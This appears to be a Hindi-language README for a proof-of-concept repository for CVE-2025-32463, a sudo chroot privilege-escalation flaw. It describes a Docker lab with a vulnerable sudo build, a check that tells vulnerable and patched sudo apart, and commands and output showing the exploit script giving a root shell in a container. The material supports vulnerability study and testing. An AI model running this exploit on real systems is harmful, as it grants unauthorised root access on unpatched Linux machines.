
चूट विकल्प के साथ sudo बाइनरी के माध्यम से रूट तक विशेषाधिकार वृद्धि। CVE-2025-32463
यह रिपॉजिटरी sudo के chroot सुविधा में CVE‑2025‑32463 विशेषाधिकार-वृद्धि दोष को प्रदर्शित करने के लिए एक न्यूनतम, पुनरुत्पादनीय वातावरण प्रदान करती है।
अधिकांश Linux वितरणों पर sudo 1.9.14 से 1.9.17 (सभी p‑संशोधन) के कमजोर बिल्ड प्रभावित होते हैं।
सुरक्षा पृष्ठ
| फ़ाइल | उद्देश्य |
|---|---|
| Dockerfile | कमजोर sudo 1.9.16p2 और बिल्ड टूल्स के साथ Ubuntu 24.04 इमेज बनाता है |
| sudo‑chwoot.sh | प्रूफ‑ऑफ‑कॉन्सेप्ट एक्सप्लॉइट जो chroot के अंदर रूट शेल उत्पन्न करता है |
| run.sh | सहायक स्क्रिप्ट जो इमेज बनाती है (यदि आवश्यक हो) और एक्सप्लॉइट कंटेनर लॉन्च करती है |
# Vulnerable sudo
pwn ~ $ sudo -R woot woot
sudo: woot: No such file or directory
# Patched sudo
pwn ~ $ sudo -R woot woot
[sudo] password for pwn:
sudo: you are not permitted to use the -R option with woot
# 1 – clone repo
$ git clone https://github.com/pr0v3rbs/CVE-2025-32463_chwoot.git
$ cd CVE-2025-32463_chwoot
# 2 – build and run Docker image (tagged "sudo-chwoot")
$ ./run.sh
# 3 – run exploit in container (runs root command directly or drops you into a root shell)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh id
woot!
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
pwn@f722d9182d1f:~$ ./sudo-chwoot.sh
woot!
root@f722d9182d1f:/# id
uid=0(root) gid=0(root) groups=0(root),1001(pwn)
root@f722d9182d1f:/#
run.sh Docker को --privileged और --rm पास करता है ताकि बाहर निकलने पर कंटेनर स्वयं साफ हो जाए।
जब आपका काम पूरा हो जाए तो इमेज हटाएँ:
docker rmi sudo-chwoot